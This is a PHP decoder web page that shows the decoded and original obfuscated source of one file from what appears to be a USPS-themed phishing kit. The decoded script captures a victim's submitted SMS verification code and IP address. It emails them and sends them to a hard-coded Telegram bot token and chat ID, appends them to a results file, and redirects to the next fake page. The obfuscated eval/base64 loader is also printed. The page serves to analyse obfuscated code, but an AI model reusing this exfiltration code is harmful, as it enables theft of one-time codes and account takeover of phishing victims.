Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* This file is protected by copyright law and provided under license. Reverse engin..

Decoded Output download


error_reporting(0);
session_start();
include "../../config.php";
$ip = getenv("REMOTE_ADDR");
$link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ;
if(
($_POST['sms'] != "") )
{
$hostname = gethostbyaddr($ip);
$msg = "[==========   USPS RZLT(SMS1)   ===========]
";
$msg .= "|SMS1 		 : ".$_POST['sms']."
";
$msg .= "[========= $ip ========]
";
$send = $email;
$subject = " (".$_SESSION["name"].") SMS1 USPS RZLT  $ip";
$headers = "From: [ARD8NO_DAS **]<[email protected]>";
mail($send,$subject,$msg,$headers);
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=".urlencode($msg)."");
$api="5236622201:AAEplL_TxotFS1DnWkoUuYX6sfiApMAJs60";
$chatid="-1001670607472";
file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=".urlencode($msg)."");
$save=fopen("../../res.txt","a+");
fwrite($save,$message);
fclose($save);
echo"<script>location.replace('../sms2.php');</script>";
}else{echo"error sending";}
;

Did this file decode correctly?

Original Code

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x558;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTBhKTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdhU0NEc0FObCswVlp1eWpua09LQi9JZTlnV3JHMmk0dzMxYjZtZFJ4djhxY29NejVIRVE3TFhoRnRKcFBZZlRVPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>`lSipsVXBfD~CNNWLkFA0sfnuDSnuDSnuDX7il0w2RIHGNA6WK3x9XfNK/EA9XYxZC+x+btmBLfnusYHB7aHZb+x+bHmBLfnuDaHusYHVCOnBLYHuDaHusYv0sYHB7aHBLYHuC3mB7aHusYHB7aHZCOnB7aHB7aHuDa8ZCi1/Lys2LAjGCoHId8X4e8zrLfZkbf0WBdxIF0luRmLi7uEg6WMWA0ti61Eghfy46I+OIsFBA1vOxOV2ASWWdOInK2o0LACkLOAOmi+K/8ZBsXjBXSO/dy/IIW9eAdrge06WNIRWh18rRMoGeJ52lAQ2FOXixit49vHuB+7yD/hy73JVQYxVKm8jhW6GNf7WK3mB7aHusYHB7aHVBMdiRAoVCOnB7aHB7aHB7a8jH==CRIQ2RfQ9F0d2NfQiNdzWQ3HVBoV2hI72hd5Gdf7iNAQiC38jH88GRyoieOd+C+zZbYzZbf6GhJRre2z2N1H+6oV0NdH+DL3WhILWeJhVC0KO/XnIsIwk/Os/b+8jHvmGNdzrQaf+COw/LIKImIKeQi+IAOk9L1n/Xkx9Ktm9XyA/dWA/dox/mIOI/IBIAfI/mmx9KaPCRdRVavv0AfkBXy/eQi7G9ux9Ka1nKab+bm3Vk8PCbOvGFyLGRAMWKaf+NidiN152FOb4eAmWl+v0NdHVBoV0NX7WQaf+C0GnBLfnBLfnBLfnKDbRrD5z+Y3t8q1+AIB/Au3/d8uIC1BBIuEVKDbRqs3t8R3PPbn+DLfnBLfnBLfnBLf9IEQ9NtbjHvmG9yx+Ctf+C0Y/LXBuKa0CKap+C+z0AfkBXy/eQi7G9ux9Ktb9l02Gb+PCbOM2h23Z6L3+dofnBLfnBLfnBL30NdH+DLfnBLfnBLf9IEQ9NtbjHvm2hIzWCaf+COdGeA8GDoV0lyXgR8dgFk3nKabt8R3PPbn+C3bZbOw/LIB/LdnBdobGRAMWK0iZb+8+Ayy/7s3IIyk/QSKemE/+jVWvjTt6Qamr9abjHvmrNI1WNIQ2Qaf+C0N2RfMjbSGkI0sjsJn9LOS/QaqVdLYreJRGLS12ROXreJ5ZRy5GBtbjH8MgedoVCO7WeJmZCO7ie0qWeyLZCOM2h2o0N1dgeOd2xu8jH8RreEd9hidiAf6GhJLWeJL2Q3brlOL2lupZQf12NmziNIoWeiQgeLzGF0xZh05iC+z0NAHrKtbZFydGROyW9y7geidnhyvg9Owrekf+btmgh11iNdmZb+RiNItiDLbZxIQGNIzghfmWK3mG9yxVKtb+bmPCbO12Nmf+6/Qu7ghu6+QuDspk/AA2NEu9XOtGFON/7AsGdicGXIXeI3h2hW8k9Syk/87y6abjHvmgh11iNdmnK+MuBaHuBgFuDgHy7kFub+PCRW8GNIwWhIL9hy5GxOdGxO7VC0vilOH27v5ZhAHrKJLWeEdWF01GKJ52R25gRfL+btmg9S8Zb+52hIzWsXd2Fy1Wh/Ugh11iAf8WDLbZbO6rNALrekz+bWLW91LnK+zi90oWeJ6GhOdVCOM2h28Zb+bVBoV0ly1iR/fWRfHWetv+btzZQtzZF0d2QJL4lkbZC01VQ+8jH8RiF08iN/v0ly1iR/o0NXd2Fy1Wh/8jH8RghE52h/v0ly1iR/8jH8dgh15+6E7gF082lkTGNf6g9O8Ghtz2RIHGNA6WK3xZbt52hX7ubJHrlaxVBoYZFy62RdHiDtbjH8fWeE7W9Mdgh15+RIQ2RfQ+lydGRO8GR2bjFLVjH==]VrxGe_ehOwW\P

Function Calls

fopen 1
fread 3
strtr 2
fclose 1
urldecode 1
str_replace 1
base64_decode 3

Variables

$O000O0O00 True
$O0O000O00 fgets
$O0O000O0O fgetc
$O0O00OO00 fread
$OO00O0000 1368
$OO00O00O0 error_reporting(0); session_start(); include "../../config...
$OOO000000 fg6sbehpra4co_tnd
$OOO00000O strtr
$OOO0000O0 base64_decode
$OOO000O00 fopen
$OOO0O0O00 index.php

Stats

MD5 8d9d8954e204a32377edfaf184584f54
Eval Count 3
Decode Time 74 ms